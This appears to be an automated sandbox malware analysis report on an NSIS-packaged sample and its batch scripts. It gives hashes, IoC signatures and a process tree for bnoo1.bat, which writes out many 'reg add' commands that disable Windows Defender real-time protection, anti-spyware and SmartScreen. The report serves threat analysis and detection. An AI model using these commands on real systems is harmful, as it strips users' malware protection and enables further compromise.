Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-12-2024 02:08
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20241010-en
windows7-x64
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240708-en
windows7-x64
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
General
-
Target
$_63_/bnoo1.bat
-
Size
2KB
-
MD5
1f89930c9e4fd56765ca2ac17e06817d
-
SHA1
cecb1c4a81dc27a6f4379ead464f418a1bf10ce9
-
SHA256
2de693852c2127d52fe758bde2fa606d3adf5f4eb790f186797abc48e3e892e7
-
SHA512
488f77ba07c40a27c3f76636fba2479146ce6aa0b6a4948677e4cc5a2937eae42f2b15c2bbf13ebb95cf3e2bd0ace5fa525072cb2bcd368571f8fe79eb6fcd1c
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2612 wrote to memory of 340 2612 cmd.exe 31 PID 2612 wrote to memory of 340 2612 cmd.exe 31 PID 2612 wrote to memory of 340 2612 cmd.exe 31 PID 2612 wrote to memory of 2724 2612 cmd.exe 32 PID 2612 wrote to memory of 2724 2612 cmd.exe 32 PID 2612 wrote to memory of 2724 2612 cmd.exe 32 PID 2612 wrote to memory of 2728 2612 cmd.exe 33 PID 2612 wrote to memory of 2728 2612 cmd.exe 33 PID 2612 wrote to memory of 2728 2612 cmd.exe 33 PID 2612 wrote to memory of 1796 2612 cmd.exe 34 PID 2612 wrote to memory of 1796 2612 cmd.exe 34 PID 2612 wrote to memory of 1796 2612 cmd.exe 34 PID 2612 wrote to memory of 2084 2612 cmd.exe 35 PID 2612 wrote to memory of 2084 2612 cmd.exe 35 PID 2612 wrote to memory of 2084 2612 cmd.exe 35 PID 2612 wrote to memory of 2520 2612 cmd.exe 36 PID 2612 wrote to memory of 2520 2612 cmd.exe 36 PID 2612 wrote to memory of 2520 2612 cmd.exe 36 PID 2612 wrote to memory of 3016 2612 cmd.exe 37 PID 2612 wrote to memory of 3016 2612 cmd.exe 37 PID 2612 wrote to memory of 3016 2612 cmd.exe 37 PID 2612 wrote to memory of 2828 2612 cmd.exe 38 PID 2612 wrote to memory of 2828 2612 cmd.exe 38 PID 2612 wrote to memory of 2828 2612 cmd.exe 38 PID 2612 wrote to memory of 2268 2612 cmd.exe 39 PID 2612 wrote to memory of 2268 2612 cmd.exe 39 PID 2612 wrote to memory of 2268 2612 cmd.exe 39 PID 2612 wrote to memory of 2276 2612 cmd.exe 40 PID 2612 wrote to memory of 2276 2612 cmd.exe 40 PID 2612 wrote to memory of 2276 2612 cmd.exe 40 PID 2612 wrote to memory of 2508 2612 cmd.exe 41 PID 2612 wrote to memory of 2508 2612 cmd.exe 41 PID 2612 wrote to memory of 2508 2612 cmd.exe 41 PID 2612 wrote to memory of 2272 2612 cmd.exe 42 PID 2612 wrote to memory of 2272 2612 cmd.exe 42 PID 2612 wrote to memory of 2272 2612 cmd.exe 42 PID 2612 wrote to memory of 2480 2612 cmd.exe 43 PID 2612 wrote to memory of 2480 2612 cmd.exe 43 PID 2612 wrote to memory of 2480 2612 cmd.exe 43 PID 2612 wrote to memory of 2784 2612 cmd.exe 44 PID 2612 wrote to memory of 2784 2612 cmd.exe 44 PID 2612 wrote to memory of 2784 2612 cmd.exe 44 PID 2612 wrote to memory of 2792 2612 cmd.exe 45 PID 2612 wrote to memory of 2792 2612 cmd.exe 45 PID 2612 wrote to memory of 2792 2612 cmd.exe 45 PID 2612 wrote to memory of 2888 2612 cmd.exe 46 PID 2612 wrote to memory of 2888 2612 cmd.exe 46 PID 2612 wrote to memory of 2888 2612 cmd.exe 46 PID 2612 wrote to memory of 2904 2612 cmd.exe 47 PID 2612 wrote to memory of 2904 2612 cmd.exe 47 PID 2612 wrote to memory of 2904 2612 cmd.exe 47 PID 2612 wrote to memory of 2900 2612 cmd.exe 48 PID 2612 wrote to memory of 2900 2612 cmd.exe 48 PID 2612 wrote to memory of 2900 2612 cmd.exe 48 PID 2612 wrote to memory of 2908 2612 cmd.exe 49 PID 2612 wrote to memory of 2908 2612 cmd.exe 49 PID 2612 wrote to memory of 2908 2612 cmd.exe 49 PID 2612 wrote to memory of 3044 2612 cmd.exe 50 PID 2612 wrote to memory of 3044 2612 cmd.exe 50 PID 2612 wrote to memory of 3044 2612 cmd.exe 50 PID 2612 wrote to memory of 2796 2612 cmd.exe 51 PID 2612 wrote to memory of 2796 2612 cmd.exe 51 PID 2612 wrote to memory of 2796 2612 cmd.exe 51 PID 2612 wrote to memory of 2440 2612 cmd.exe 52
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnoo1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:340
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f2⤵PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f2⤵PID:1796
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f2⤵PID:2084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f2⤵PID:2520
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f2⤵PID:3016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f2⤵PID:2828
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f2⤵PID:2268
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f2⤵PID:2276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f2⤵PID:2508
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2480
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2784
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2792
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2888
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2900
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2908
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f2⤵PID:2796
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f2⤵PID:2440
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f2⤵PID:2748
-